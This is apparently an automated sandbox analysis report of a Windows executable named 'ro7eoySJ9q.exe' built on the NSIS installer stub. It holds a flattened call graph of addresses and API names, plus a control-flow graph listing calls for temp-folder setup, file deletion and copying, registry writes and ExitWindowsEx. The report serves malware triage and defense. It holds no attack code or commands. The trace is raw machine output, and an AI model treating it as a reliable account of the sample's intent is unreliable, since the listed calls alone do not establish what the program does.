3754->3769 3763 404d46 3755->3763 3757->3745 3760 404bbb 3758->3760 3759->3769 3761 404bc1 ShowWindow 3760->3761 3762 404bd9 3760->3762 3781 403fca SendMessageW 3761->3781 3782 403fca SendMessageW 3762->3782 3767 404d57 SendMessageW 3763->3767 3766->3753 3767->3738 3768->3758 3768->3760 3769->3749 3770->3753 3771->3753 3772->3777 3773->3736 3773->3750 3774 404ef1 InvalidateRect 3774->3754 3775 404f07 3774->3775 3783 4047de 3775->3783 3776 404e15 SendMessageW 3780 404e2b 3776->3780 3777->3776 3777->3780 3779 404e9f SendMessageW SendMessageW 3779->3780 3780->3774 3780->3779 3781->3769 3782->3740 3784 4047fb 3783->3784 3785 405d68 18 API calls 3784->3785 3786 404830 3785->3786 3787 405d68 18 API calls 3786->3787 3788 40483b 3787->3788 3789 405d68 18 API calls 3788->3789 3790 40486c lstrlenW wsprintfW SetDlgItemTextW 3789->3790 3790->3754 3791 404778 3792 4047a4 3791->3792 3793 404788 3791->3793 3795 4047d7 3792->3795 3796 4047aa SHGetPathFromIDListW 3792->3796 3802 40550d GetDlgItemTextW 3793->3802 3798 4047c1 SendMessageW 3796->3798 3799 4047ba 3796->3799 3797 404795 SendMessageW 3797->3792 3798->3795 3800 40140b 2 API calls 3799->3800 3800->3798 3802->3797 3803 4014ff 3804 401507 3803->3804 3806 40151a 3803->3806 3805 402ab3 18 API calls 3804->3805 3805->3806 3807 401000 3808 401037 BeginPaint GetClientRect 3807->3808 3809 40100c DefWindowProcW 3807->3809 3811 4010f3 3808->3811 3812 401179 3809->3812 3813 401073 CreateBrushIndirect FillRect DeleteObject 3811->3813 3814 4010fc 3811->3814 3813->3811 3815 401102 CreateFontIndirectW 3814->3815 3816 401167 EndPaint 3814->3816 3815->3816 3817 401112 6 API calls 3815->3817 3816->3812 3817->3816 3818 401a00 3819 402ad0 18 API calls 3818->3819 3820 401a09 ExpandEnvironmentStringsW 3819->3820 3821 401a1d 3820->3821 3823 401a30 3820->3823 3822 401a22 lstrcmpW 3821->3822 3821->3823 3822->3823 3824 401b01 3825 402ad0 18 API calls 3824->3825 3826 401b08 3825->3826 3827 402ab3 18 API calls 3826->3827 3828 401b11 wsprintfW 3827->3828 3829 40295d 3828->3829 3830 402706 3831 402ad0 18 API calls 3830->3831 3832 40270d FindFirstFileW 3831->3832 3833 402720 3832->3833 3834 402735 3832->3834 3838 405c8d wsprintfW 3834->3838 3836 40273e 3839 405d46 lstrcpynW 3836->3839 3838->3836 3839->3833 2852 401f08 2853 402ad0 18 API calls 2852->2853 2854 401f0f GetFileVersionInfoSizeW 2853->2854 2855 401f36 GlobalAlloc 2854->2855 2856 40295d 2854->2856 2855->2856 2857 401f4a 2855->2857 2858 401f8c 2857->2858 2862 405c8d wsprintfW 2857->2862 2858->2856 2860 401f7e 2863 405c8d wsprintfW 2860->2863 2862->2860 2863->2858 3840 401c8e 3841 402ab3 18 API calls 3840->3841 3842 401c94 IsWindow 3841->3842 3843 4019f0 3842->3843 3844 40268f 3845 402696 3844->3845 3848 402908 3844->3848 3846 402ab3 18 API calls 3845->3846 3847 4026a1 3846->3847 3849 4026a8 SetFilePointer 3847->3849 3849->3848 3850 4026b8 3849->3850 3852 405c8d wsprintfW 3850->3852 3852->3848 3853 401491 3854 404ffa 25 API calls 3853->3854 3855 401498 3854->3855 2969 402293 2970 402ad0 18 API calls 2969->2970 2971 4022a2 2970->2971 2972 402ad0 18 API calls 2971->2972 2973 4022ab 2972->2973 2974 402ad0 18 API calls 2973->2974 2975 4022b5 GetPrivateProfileStringW 2974->2975 3856 402c15 3857 402c40 3856->3857 3858 402c27 SetTimer 3856->3858 3859 402c95 3857->3859 3860 402c5a MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 3857->3860 3858->3857 3860->3859 3861 401718 3862 402ad0 18 API calls 3861->3862 3863 40171f SearchPathW 3862->3863 3864 40173a 3863->3864 3865 401f98 3866 40205c 3865->3866 3867 401faa 3865->3867 3870 401423 25 API calls 3866->3870 3868 402ad0 18 API calls 3867->3868 3869 401fb1 3868->3869 3871 402ad0 18 API calls 3869->3871 3876 402195 3870->3876 3872 401fba 3871->3872 3873 401fd0 LoadLibraryExW 3872->3873 3874 401fc2 GetModuleHandleW 3872->3874 3873->3866 3875 401fe1 3873->3875 3874->3873 3874->3875 3885 40611c WideCharToMultiByte 3875->3885 3879 401ff2 3882 401423 25 API calls 3879->3882 3883 402002 3879->3883 3880 40202b 3881 404ffa 25 API calls 3880->3881 3881->3883 3882->3883 3883->3876 3884 40204e FreeLibrary 3883->3884 3884->3876 3886 406146 GetProcAddress 3885->3886 3887 401fec 3885->3887 3886->3887 3887->3879 3887->3880 3081 40159b 3082 402ad0 18 API calls 3081->3082 3083 4015a2 SetFileAttributesW 3082->3083 3084 4015b4 3083->3084 3888 40149e 3889 40223c 3888->3889 3890 4014ac PostQuitMessage 3888->3890 3890->3889 3891 40219e 3892 402ad0 18 API calls 3891->3892 3893 4021a4 3892->3893 3894 402ad0 18 API calls 3893->3894 3895 4021ad 3894->3895 3896 402ad0 18 API calls 3895->3896 3897 4021b6 3896->3897 3898 406089 2 API calls 3897->3898 3899 4021bf 3898->3899 3900 4021d0 lstrlenW lstrlenW 3899->3900 3901 4021c3 3899->3901 3903 404ffa 25 API calls 3900->3903 3902 404ffa 25 API calls 3901->3902 3905 4021cb 3901->3905 3902->3905 3904 40220e SHFileOperationW 3903->3904 3904->3901 3904->3905 3906 401b22 3907 401b73 3906->3907 3908 401b2f 3906->3908 3910 401b78 3907->3910 3911 401b9d GlobalAlloc 3907->3911 3909 402229 3908->3909 3915 401b46 3908->3915 3912 405d68 18 API calls 3909->3912 3921 401bb8 3910->3921 3927 405d46 lstrcpynW 3910->3927 3913 405d68 18 API calls 3911->3913 3914 402236 3912->3914 3913->3921 3920 405529 MessageBoxIndirectW 3914->3920 3925 405d46 lstrcpynW 3915->3925 3918 401b8a GlobalFree 3918->3921 3919 401b55 3926 405d46 lstrcpynW 3919->3926 3920->3921 3923 401b64 3928 405d46 lstrcpynW 3923->3928 3925->3919 3926->3923 3927->3918 3928->3921 3929 402222 3930 402229 3929->3930 3932 40223c 3929->3932 3931 405d68 18 API calls 3930->3931 3933 402236 3931->3933 3934 405529 MessageBoxIndirectW 3933->3934 3934->3932 2665 401924 2666 401926 2665->2666 2671 402ad0 2666->2671 2672 402adc 2671->2672 2718 405d68 2672->2718 2675 40192b 2677 4055d5 2675->2677 2757 4058b6 2677->2757 2680 405614 2683 405755 2680->2683 2771 405d46 lstrcpynW 2680->2771 2681 4055fd DeleteFileW 2682 401934 2681->2682 2683->2682 2801 406089 FindFirstFileW 2683->2801 2685 40563a 2686 405640 lstrcatW 2685->2686 2687 40564d 2685->2687 2689 405653 2686->2689 2772 4057fa lstrlenW 2687->2772 2692 405663 lstrcatW 2689->2692 2693 405659 2689->2693 2695 40566e lstrlenW FindFirstFileW 2692->2695 2693->2692 2693->2695 2694 405773 2804 4057ae lstrlenW CharPrevW 2694->2804 2696 40574a 2695->2696 2716 405691 2695->2716 2696->2683 2698 4057db CharNextW 2698->2716 2700 40558d 5 API calls 2701 405785 2700->2701 2702 405789 2701->2702 2703 40579f 2701->2703 2702->2682 2708 404ffa 25 API calls 2702->2708 2704 404ffa 25 API calls 2703->2704 2704->2682 2705 405729 FindNextFileW 2707 405741 FindClose 2705->2707 2705->2716 2707->2696 2709 405796 2708->2709 2711 405be0 40 API calls 2709->2711 2712 40579d 2711->2712 2712->2682 2713 4055d5 64 API calls 2713->2716 2714 404ffa 25 API calls 2714->2705 2716->2698 2716->2705 2716->2713 2716->2714 2776 405d46 lstrcpynW 2716->2776 2777 40558d 2716->2777 2785 404ffa 2716->2785 2796 405be0 2716->2796 2722 405d75 2718->2722 2719 405fc0 2720 402afd 2719->2720 2752 405d46 lstrcpynW 2719->2752 2720->2675 2736 405fda 2720->2736 2722->2719 2723 405e28 GetVersion 2722->2723 2724 405f8e lstrlenW 2722->2724 2727 405d68 10 API calls 2722->2727 2729 405ea3 GetSystemDirectoryW 2722->2729 2730 405eb6 GetWindowsDirectoryW 2722->2730 2731 405fda 5 API calls 2722->2731 2732 405d68 10 API calls 2722->2732 2733 405f2f lstrcatW 2722->2733 2734 405eea SHGetSpecialFolderLocation 2722->2734 2745 405c13 RegOpenKeyExW 2722->2745 2750 405c8d wsprintfW 2722->2750 2751 405d46 lstrcpynW 2722->2751 2723->2722 2724->2722 2727->2724 2729->2722 2730->2722 2731->2722 2732->2722 2733->2722 2734->2722 2735 405f02 SHGetPathFromIDListW CoTaskMemFree 2734->2735 2735->2722 2742 405fe7 2736->2742 2737 40605d 2738 406062 CharPrevW 2737->2738 2741 406083 2737->2741 2738->2737 2739 406050 CharNextW 2739->2737 2739->2742 2741->2675 2742->2737 2742->2739 2743 40603c CharNextW 2742->2743 2744 40604b CharNextW 2742->2744 2753 4057db 2742->2753 2743->2742 2744->2739 2746 405c87 2745->2746 2747 405c47 RegQueryValueExW 2745->2747 2746->2722 2748 405c68 RegCloseKey 2747->2748 2748->2746 2750->2722 2751->2722 2752->2720 2754 4057e1 2753->2754 2755 4057f7 2754->2755 2756 4057e8 CharNextW 2754->2756 2755->2742 2756->2754 2807 405d46 lstrcpynW 2757->2807 2759 4058c7 2808 405859 CharNextW CharNextW 2759->2808 2762 4055f5 2762->2680 2762->2681 2763 405fda 5 API calls 2769 4058dd 2763->2769 2764 40590e lstrlenW 2765 405919 2764->2765 2764->2769 2767 4057ae 3 API calls 2765->2767 2766 406089 2 API calls 2766->2769 2768 40591e GetFileAttributesW 2767->2768 2768->2762 2769->2762 2769->2764 2769->2766 2770 4057fa 2 API calls 2769->2770 2770->2764 2771->2685 2773 405808 2772->2773 2774 40581a 2773->2774 2775 40580e CharPrevW 2773->2775 2774->2689 2775->2773 2775->2774 2776->2716 2814 4059aa GetFileAttributesW 2777->2814 2780 4055ba 2780->2716 2781 4055b0 DeleteFileW 2783 4055b6 2781->2783 2782 4055a8 RemoveDirectoryW 2782->2783 2783->2780 2784 4055c6 SetFileAttributesW 2783->2784 2784->2780 2786 4050b7 2785->2786 2788 405015 2785->2788 2786->2716 2787 405031 lstrlenW 2790 40505a 2787->2790 2791 40503f lstrlenW 2787->2791 2788->2787 2789 405d68 18 API calls 2788->2789 2789->2787 2793 405060 SetWindowTextW 2790->2793 2794 40506d 2790->2794 2791->2786 2792 405051 lstrcatW 2791->2792 2792->2790 2793->2794 2794->2786 2795 405073 SendMessageW SendMessageW SendMessageW 2794->2795 2795->2786 2817 4060b0 GetModuleHandleA 2796->2817 2800 405c08 2800->2716 2802 40576f 2801->2802 2803 40609f FindClose 2801->2803 2802->2682 2802->2694 2803->2802 2805 405779 2804->2805 2806 4057ca lstrcatW 2804->2806 2805->2700 2806->2805 2807->2759 2809 405876 2808->2809 2812 405888 2808->2812 2811 405883 CharNextW 2809->2811 2809->2812 2810 4058ac 2810->2762 2810->2763 2811->2810 2812->2810 2813 4057db CharNextW 2812->2813 2813->2812 2815 405599 2814->2815 2816 4059bc SetFileAttributesW 2814->2816 2815->2780 2815->2781 2815->2782 2816->2815 2818 4060d7 GetProcAddress 2817->2818 2819 4060cc LoadLibraryA 2817->2819 2820 405be7 2818->2820 2819->2818 2819->2820 2820->2800 2821 405a52 lstrcpyW 2820->2821 2822 405aa1 GetShortPathNameW 2821->2822 2823 405a7b 2821->2823 2824 405ab6 2822->2824 2825 405bda 2822->2825 2845 4059cf GetFileAttributesW CreateFileW 2823->2845 2824->2825 2827 405abe wsprintfA 2824->2827 2825->2800 2829 405d68 18 API calls 2827->2829 2828 405a85 CloseHandle GetShortPathNameW 2828->2825 2830 405a99 2828->2830 2831 405ae6 2829->2831 2830->2822 2830->2825 2846 4059cf GetFileAttributesW CreateFileW 2831->2846 2833 405af3 2833->2825 2834 405b02 GetFileSize GlobalAlloc 2833->2834 2835 405bd3 CloseHandle 2834->2835 2836 405b24 ReadFile 2834->2836 2835->2825 2836->2835 2837 405b3c 2836->2837 2837->2835 2847 405934 lstrlenA 2837->2847 2840 405b55 lstrcpyA 2843 405b77 2840->2843 2841 405b69 2842 405934 4 API calls 2841->2842 2842->2843 2844 405bae SetFilePointer WriteFile GlobalFree 2843->2844 2844->2835 2845->2828 2846->2833 2848 405975 lstrlenA 2847->2848 2849 40594e lstrcmpiA 2848->2849 2851 40597d 2848->2851 2850 40596c CharNextA 2849->2850 2849->2851 2850->2848 2851->2840 2851->2841 3935 4040a9 lstrcpynW lstrlenW 3936 401cab 3937 402ab3 18 API calls 3936->3937 3938 401cb2 3937->3938 3939 402ab3 18 API calls 3938->3939 3940 401cba GetDlgItem 3939->3940 3941 4024e6 3940->3941 3942 40232f 3943 402335 3942->3943 3944 402ad0 18 API calls 3943->3944 3945 402347 3944->3945 3946 402ad0 18 API calls 3945->3946 3947 402351 RegCreateKeyExW 3946->3947 3948 40237b 3947->3948 3949 402729 3947->3949 3950 402396 3948->3950 3951 402ad0 18 API calls 3948->3951 3952 4023a2 3950->3952 3954 402ab3 18 API calls 3950->3954 3953 40238c lstrlenW 3951->3953 3955 4023bd RegSetValueExW 3952->3955 3956 402f38 33 API calls 3952->3956 3953->3950 3954->3952 3957 4023d3 RegCloseKey 3955->3957 3956->3955 3957->3949 3959 4016af 3960 402ad0 18 API calls 3959->3960 3961 4016b5 GetFullPathNameW 3960->3961 3962 4016cf 3961->3962 3968 4016f1 3961->3968 3965 406089 2 API calls 3962->3965 3962->3968 3963 401706 GetShortPathNameW 3964 40295d 3963->3964 3966 4016e1 3965->3966 3966->3968 3969 405d46 lstrcpynW 3966->3969 3968->3963 3968->3964 3969->3968 3970 404430 3971 40445c 3970->3971 3972 40446d 3970->3972 4031 40550d GetDlgItemTextW 3971->4031 3974 404479 GetDlgItem 3972->3974 4007 4044d8 3972->4007 3976 40448d 3974->3976 3975 404467 3978 405fda 5 API calls 3975->3978 3980 4044a1 SetWindowTextW 3976->3980 3986 405859 4 API calls 3976->3986 3977 4045bc 3981 40475d 3977->3981 4033 40550d GetDlgItemTextW 3977->4033 3978->3972 3984 403f95 19 API calls 3980->3984 3985 403ffc 8 API calls 3981->3985 3982 405d68 18 API calls 3987 40454c SHBrowseForFolderW 3982->3987 3983 4045ec 3988 4058b6 18 API calls 3983->3988 3989 4044bd 3984->3989 3990 404771 3985->3990 3991 404497 3986->3991 3987->3977 3992 404564 CoTaskMemFree 3987->3992 3993 4045f2 3988->3993 3994 403f95 19 API calls 3989->3994 3991->3980 3997 4057ae 3 API calls 3991->3997 3995 4057ae 3 API calls 3992->3995 4034 405d46 lstrcpynW 3993->4034 3996 4044cb 3994->3996 3998 404571 3995->3998 4032 403fca SendMessageW 3996->4032 3997->3980 4001 4045a8 SetDlgItemTextW 3998->4001 4006 405d68 18 API calls 3998->4006 4001->3977 4002 4044d1 4004 4060b0 3 API calls 4002->4004 4003 404609 4005 4060b0 3 API calls 4003->4005 4004->4007 4014 404611 4005->4014 4008 404590 lstrcmpiW 4006->4008 4007->3977 4007->3981 4007->3982 4008->4001 4011 4045a1 lstrcatW 4008->4011 4009 404650 4035 405d46 lstrcpynW 4009->4035 4011->4001 4012 404657 4013 405859 4 API calls 4012->4013 4015 40465d GetDiskFreeSpaceW 4013->4015 4014->4009 4017 4057fa 2 API calls 4014->4017 4019 4046a2 4014->4019 4018 404680 MulDiv 4015->4018 4015->4019 4017->4014 4018->4019 4020 40470c 4019->4020 4021 4047de 21 API calls 4019->4021 4022 40472f 4020->4022 4024 40140b 2 API calls 4020->4024 4023 4046fe 4021->4023 4036 403fb7 KiUserCallbackDispatcher 4022->4036 4026 404703 4023->4026 4027 40470e SetDlgItemTextW 4023->4027 4024->4022 4029 4047de 21 API calls 4026->4029 4027->4020 4028 40474b 4028->3981 4037 4043c5 4028->4037 4029->4020 4031->3975 4032->4002 4033->3983 4034->4003 4035->4012 4036->4028 4038 4043d3 4037->4038 4039 4043d8 SendMessageW 4037->4039 4038->4039 4039->3981 4040 404132 4041 40414a 4040->4041 4048 404264 4040->4048 4045 403f95 19 API calls 4041->4045 4042 4042ce 4043 4043a0 4042->4043 4044 4042d8 GetDlgItem 4042->4044 4050 403ffc 8 API calls 4043->4050 4046 404361 4044->4046 4047 4042f2 4044->4047 4049 4041b1 4045->4049 4046->4043 4055 404373 4046->4055 4047->4046 4054 404318 6 API calls 4047->4054 4048->4042 4048->4043 4051 40429f GetDlgItem SendMessageW 4048->4051 4053 403f95 19 API calls 4049->4053 4062 40439b 4050->4062 4071 403fb7 KiUserCallbackDispatcher 4051->4071 4057 4041be CheckDlgButton 4053->4057 4054->4046 4058 404389 4055->4058 4059 404379 SendMessageW 4055->4059 4056 4042c9 4060 4043c5 SendMessageW 4056->4060 4069 403fb7 KiUserCallbackDispatcher 4057->4069 4058->4062 4063 40438f SendMessageW 4058->4063 4059->4058 4060->4042 4063->4062 4064 4041dc GetDlgItem 4070 403fca SendMessageW 4064->4070 4066 4041f2 SendMessageW 4067 404218 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4066->4067 4068 40420f GetSysColor 4066->4068 4067->4062 4068->4067 4069->4064 4070->4066 4071->4056 4072 402938 SendMessageW 4073 402952 InvalidateRect 4072->4073 4074 40295d 4072->4074 4073->4074 4075 4014b8 4076 4014be 4075->4076 4077 401389 2 API calls 4076->4077 4078 4014c6 4077->4078 2976 4015b9 2977 402ad0 18 API calls 2976->2977 2978 4015c0 2977->2978 2979 405859 4 API calls 2978->2979 2986 4015c9 2979->2986 2980 401614 2981 401646 2980->2981 2982 401619 2980->2982 2989 401423 25 API calls 2981->2989 2994 401423 2982->2994 2983 4057db CharNextW 2984 4015d7 CreateDirectoryW 2983->2984 2984->2986 2987 4015ed GetLastError 2984->2987 2986->2980 2986->2983 2987->2986 2990 4015fa GetFileAttributesW 2987->2990 2993 40163e 2989->2993 2990->2986 2992 40162d SetCurrentDirectoryW 2992->2993 2995 404ffa 25 API calls 2994->2995 2996 401431 2995->2996 2997 405d46 lstrcpynW 2996->2997 2997->2992 2998 405139 2999 4052e5 2998->2999 3000 40515a GetDlgItem GetDlgItem GetDlgItem 2998->3000 3001 4052ee GetDlgItem CreateThread CloseHandle 2999->3001 3003 405316 2999->3003 3044 403fca SendMessageW 3000->3044 3001->3003 3067 4050cd OleInitialize 3001->3067 3005 405363 3003->3005 3006 40532d ShowWindow ShowWindow 3003->3006 3007 405341 3003->3007 3004 4051cb 3009 4051d2 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3004->3009 3053 403ffc 3005->3053 3049 403fca SendMessageW 3006->3049 3008 40539f 3007->3008 3011 405352 3007->3011 3012 405378 ShowWindow 3007->3012 3008->3005 3016 4053aa SendMessageW 3008->3016 3014 405241 3009->3014 3015 405225 SendMessageW SendMessageW 3009->3015 3050 403f6e 3011->3050 3019 405398 3012->3019 3020 40538a 3012->3020 3022 405254 3014->3022 3023 405246 SendMessageW 3014->3023 3015->3014 3018 405371 3016->3018 3024 4053c3 CreatePopupMenu 3016->3024 3021 403f6e SendMessageW 3019->3021 3025 404ffa 25 API calls 3020->3025 3021->3008 3045 403f95 3022->3045 3023->3022 3026 405d68 18 API calls 3024->3026 3025->3019 3028 4053d3 AppendMenuW 3026->3028 3030 4053e6 GetWindowRect 3028->3030 3031 4053f9 3028->3031 3029 405264 3032 4052a1 GetDlgItem SendMessageW 3029->3032 3033 40526d ShowWindow 3029->3033 3034 405402 TrackPopupMenu 3030->3034 3031->3034 3032->3018 3037 4052c8 SendMessageW SendMessageW 3032->3037 3035 405290 3033->3035 3036 405283 ShowWindow 3033->3036 3034->3018 3038 405420 3034->3038 3048 403fca SendMessageW 3035->3048 3036->3035 3037->3018 3039 40543c SendMessageW 3038->3039 3039->3039 3041 405459 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3039->3041 3042 40547e SendMessageW 3041->3042 3042->3042 3043 4054a7 GlobalUnlock SetClipboardData CloseClipboard 3042->3043 3043->3018 3044->3004 3046 405d68 18 API calls 3045->3046 3047 403fa0 SetDlgItemTextW 3046->3047 3047->3029 3048->3032 3049->3007 3051 403f75 3050->3051 3052 403f7b SendMessageW 3050->3052 3051->3052 3052->3005 3054 40409d 3053->3054 3055 404014 GetWindowLongW 3053->3055 3054->3018 3055->3054 3056 404025 3055->3056 3057 404034 GetSysColor 3056->3057 3058 404037 3056->3058 3057->3058 3059 404047 SetBkMode 3058->3059 3060 40403d SetTextColor 3058->3060 3061 404065 3059->3061 3062 40405f GetSysColor 3059->3062 3060->3059 3063 404076 3061->3063 3064 40406c SetBkColor 3061->3064 3062->3061 3063->3054 3065 404090 CreateBrushIndirect 3063->3065 3066 404089 DeleteObject 3063->3066 3064->3063 3065->3054 3066->3065 3074 403fe1 3067->3074 3069 4050f0 3073 405117 3069->3073 3077 401389 3069->3077 3070 403fe1 SendMessageW 3071 405129 CoUninitialize 3070->3071 3073->3070 3075 403ff9 3074->3075 3076 403fea SendMessageW 3074->3076 3075->3069 3076->3075 3079 401390 3077->3079 3078 4013fe 3078->3069 3079->3078 3080 4013cb MulDiv SendMessageW 3079->3080 3080->3079 4079 401939 4080 402ad0 18 API calls 4079->4080 4081 401940 lstrlenW 4080->4081 4082 4024e6 4081->4082 4082->4082 3301 403abd 3302 403c10 3301->3302 3303 403ad5 3301->3303 3305 403c21 GetDlgItem GetDlgItem 3302->3305 3306 403c61 3302->3306 3303->3302 3304 403ae1 3303->3304 3307 403aec SetWindowPos 3304->3307 3308 403aff 3304->3308 3309 403f95 19 API calls 3305->3309 3310 403cbb 3306->3310 3315 401389 2 API calls 3306->3315 3307->3308 3312 403b04 ShowWindow 3308->3312 3313 403b1c 3308->3313 3314 403c4b SetClassLongW 3309->3314 3311 403fe1 SendMessageW 3310->3311 3316 403c0b 3310->3316 3342 403ccd 3311->3342 3312->3313 3317 403b24 DestroyWindow 3313->3317 3318 403b3e 3313->3318 3319 40140b 2 API calls 3314->3319 3320 403c93 3315->3320 3321 403f1e 3317->3321 3322 403b43 SetWindowLongW 3318->3322 3323 403b54 3318->3323 3319->3306 3320->3310 3324 403c97 SendMessageW 3320->3324 3321->3316 3332 403f4f ShowWindow 3321->3332 3322->3316 3327 403b60 GetDlgItem 3323->3327 3328 403bfd 3323->3328 3324->3316 3325 40140b 2 API calls 3325->3342 3326 403f20 DestroyWindow EndDialog 3326->3321 3329 403b90 3327->3329 3330 403b73 SendMessageW IsWindowEnabled 3327->3330 3331 403ffc 8 API calls 3328->3331 3334 403b9d 3329->3334 3335 403be4 SendMessageW 3329->3335 3336 403bb0 3329->3336 3346 403b95 3329->3346 3330->3316 3330->3329 3331->3316 3332->3316 3333 405d68 18 API calls 3333->3342 3334->3335 3334->3346 3335->3328 3339 403bb8 3336->3339 3340 403bcd 3336->3340 3337 403f6e SendMessageW 3341 403bcb 3337->3341 3338 403f95 19 API calls 3338->3342 3344 40140b 2 API calls 3339->3344 3343 40140b 2 API calls 3340->3343 3341->3328 3342->3316 3342->3325 3342->3326 3342->3333 3342->3338 3347 403f95 19 API calls 3342->3347 3362 403e60 DestroyWindow 3342->3362 3345 403bd4 3343->3345 3344->3346 3345->3328 3345->3346 3346->3337 3348 403d48 GetDlgItem 3347->3348 3349 403d65 ShowWindow KiUserCallbackDispatcher 3348->3349 3350 403d5d 3348->3350 3371 403fb7 KiUserCallbackDispatcher 3349->3371 3350->3349 3352 403d8f EnableWindow 3355 403da3 3352->3355 3353 403da8 GetSystemMenu EnableMenuItem SendMessageW 3354 403dd8 SendMessageW 3353->3354 3353->3355 3354->3355 3355->3353 3372 403fca SendMessageW 3355->3372 3373 405d46 lstrcpynW 3355->3373 3358 403e06 lstrlenW 3359 405d68 18 API calls 3358->3359 3360 403e1c SetWindowTextW 3359->3360 3361 401389 2 API calls 3360->3361 3361->3342 3362->3321 3363 403e7a CreateDialogParamW 3362->3363 3363->3321 3364 403ead 3363->3364 3365 403f95 19 API calls 3364->3365 3366 403eb8 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3365->3366 3367 401389 2 API calls 3366->3367 3368 403efe 3367->3368 3368->3316 3369 403f06 ShowWindow 3368->3369 3370 403fe1 SendMessageW 3369->3370 3370->3321 3371->3352 3372->3355 3373->3358 3390 40173f 3391 402ad0 18 API calls 3390->3391 3392 401746 3391->3392 3393 4059fe 2 API calls 3392->3393 3394 40174d 3393->3394 3395 4059fe 2 API calls 3394->3395 3395->3394 4083 4026bf 4084 4026c6 4083->4084 4085 40295d 4083->4085 4086 4026cc FindClose 4084->4086 4086->4085

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 0 4031dd-403273 #17 SetErrorMode OleInitialize call 4060b0 SHGetFileInfoW call 405d46 GetCommandLineW call 405d46 GetModuleHandleW 7 403275-40327c 0->7 8 40327d-40328f call 4057db CharNextW 0->8 7->8 11 403358-40335e 8->11 12 403294-40329a 11->12 13 403364 11->13 14 4032a3-4032a9 12->14 15 40329c-4032a1 12->15 16 403378-403392 GetTempPathW call 4031a9 13->16 17 4032b0-4032b4 14->17 18 4032ab-4032af 14->18 15->14 15->15 26 403394-4033b2 GetWindowsDirectoryW lstrcatW call 4031a9 16->26 27 4033ea-403404 DeleteFileW call 402cff 16->27 20 403349-403354 call 4057db 17->20 21 4032ba-4032c0 17->21 18->17 20->11 35 403356-403357 20->35 24 4032c2-4032c9 21->24 25 4032d5-4032ec 21->25 30 4032d0 24->30 31 4032cb-4032ce 24->31 32 40331a-403330 25->32 33 4032ee-403304 25->33 26->27 44 4033b4-4033e4 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4031a9 26->44 40 40349a-4034a9 call 403640 OleUninitialize 27->40 41 40340a-403410 27->41 30->25 31->25 31->30 32->20 39 403332-403347 32->39 33->32 37 403306-40330e 33->37 35->11 42 403310-403313 37->42 43 403315 37->43 39->20 45 403366-403373 call 405d46 39->45 57 4035a5-4035ab 40->57 58 4034af-4034bf call 405529 ExitProcess 40->58 46 403412-40341d call 4057db 41->46 47 40348a-403491 call 40371a 41->47 42->32 42->43 43->32 44->27 44->40 45->16 61 403454-40345e 46->61 62 40341f-403430 46->62 56 403496 47->56 56->40 59 403628-403630 57->59 60 4035ad-4035ca call 4060b0 * 3 57->60 66 403632 59->66 67 403636-40363a ExitProcess 59->67 92 403614-40361f ExitWindowsEx 60->92 93 4035cc-4035ce 60->93 68 403460-40346e call 4058b6 61->68 69 4034c5-4034df lstrcatW lstrcmpiW 61->69 65 403432-403434 62->65 72 403436-40344c 65->72 73 40344e-403452 65->73 66->67 68->40 83 403470-403486 call 405d46 * 2 68->83 69->40 75 4034e1-4034f7 CreateDirectoryW SetCurrentDirectoryW 69->75 72->61 72->73 73->61 73->65 78 403504-40352d call 405d46 75->78 79 4034f9-4034ff call 405d46 75->79 88 403532-40354e call 405d68 DeleteFileW 78->88 79->78 83->47 98 403550-403560 CopyFileW 88->98 99 40358f-403597 88->99 92->59 96 403621-403623 call 40140b 92->96 93->92 97 4035d0-4035d2 93->97 96->59 97->92 101 4035d4-4035e6 GetCurrentProcess 97->101 98->99 103 403562-403582 call 405be0 call 405d68 call 4054c8 98->103 99->88 102 403599-4035a0 call 405be0 99->102 101->92 107 4035e8-40360a 101->107 102->40 103->99 115 403584-40358b CloseHandle 103->115 107->92 115->99
                                                                      APIs
                                                                      • #17.COMCTL32 ref: 004031FC
                                                                      • SetErrorMode.KERNELBASE(00008001), ref: 00403207
                                                                      • OleInitialize.OLE32(00000000), ref: 0040320E
                                                                        • Part of subcall function 004060B0: GetModuleHandleA.KERNEL32(?,?,00000020,00403220,00000008), ref: 004060C2
                                                                        • Part of subcall function 004060B0: LoadLibraryA.KERNELBASE(?,?,00000020,00403220,00000008), ref: 004060CD
                                                                        • Part of subcall function 004060B0: GetProcAddress.KERNEL32(00000000,?), ref: 004060DE
                                                                      • SHGetFileInfoW.SHELL32(0042B1B8,00000000,?,000002B4,00000000), ref: 00403236
                                                                        • Part of subcall function 00405D46: lstrcpynW.KERNEL32(?,?,00000400,0040324B,00433EA0,NSIS Error), ref: 00405D53
                                                                      • GetCommandLineW.KERNEL32(00433EA0,NSIS Error), ref: 0040324B
                                                                      • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\ro7eoySJ9q.exe",00000000), ref: 0040325E
                                                                      • CharNextW.USER32(00000000,"C:\Users\user\Desktop\ro7eoySJ9q.exe",00000020), ref: 00403285
                                                                      • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403389
                                                                      • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040339A
                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004033A6
                                                                      • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004033BA
                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004033C2
                                                                      • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004033D3
                                                                      • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004033DB
                                                                      • DeleteFileW.KERNELBASE(1033), ref: 004033EF
                                                                      • OleUninitialize.OLE32(?), ref: 0040349F
                                                                      • ExitProcess.KERNEL32 ref: 004034BF
                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\ro7eoySJ9q.exe",00000000,?), ref: 004034CB
